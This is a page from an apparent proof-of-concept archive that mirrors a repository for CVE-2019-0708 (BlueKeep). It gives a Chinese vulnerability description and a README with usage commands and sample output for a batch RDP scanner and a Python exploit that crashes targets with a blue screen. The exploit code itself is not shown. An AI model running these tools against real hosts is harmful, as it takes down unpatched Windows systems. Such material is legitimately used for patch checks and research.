Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-0708 PoC — Microsoft Remote Desktop Services 资源管理错误漏洞

Source
Associated Vulnerability
Title:Microsoft Remote Desktop Services 资源管理错误漏洞 (CVE-2019-0708)
Description:Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Remote Desktop Services是其中的一个远程桌面服务组件。 Microsoft Remote Desktop Services中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。以下
Description
CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。
Readme
# CVE-2019-0708
CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。

### 0x01 扫描 - windows
usage:  
rdpscan.exe ip1-ip2

	> .\rdpscan.exe 192.168.1.1-192.168.1.2
	192.168.1.1 - VULNERABLE - CVE-2019-0708
	192.168.1.2 - SAFE - CredSSP/NLA required

rdpscan.exe --file ip.txt

	> .\rdpscan.exe --file ip.txt
	192.168.1.1 - VULNERABLE - CVE-2019-0708
	192.168.1.2 - SAFE - CredSSP/NLA required

### 0x02 POC利用
usage:  
python poc.py ip 系统位数

	> python .\cve-2019-0708-poc.py 192.168.1.1 32
	[+] ClientData Packet Sent
	[+] ChannelJoin/ErectDomain/AttachUser Sent
	[+] ClientInfo Packet Sent
	[+] ConfirmActive Packet Sent
	[+] Session Established
	[+] Vuln Should Trigger
File Snapshot

[4.0K] /data/pocs/4a315d91ad8426cf3f38d41fc8f78ca952045364 ├── [ 16K] cve-2019-0708-poc.py ├── [2.5M] libcrypto-1_1.dll ├── [605K] libssl-1_1.dll ├── [168K] rdpscan.exe └── [ 714] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.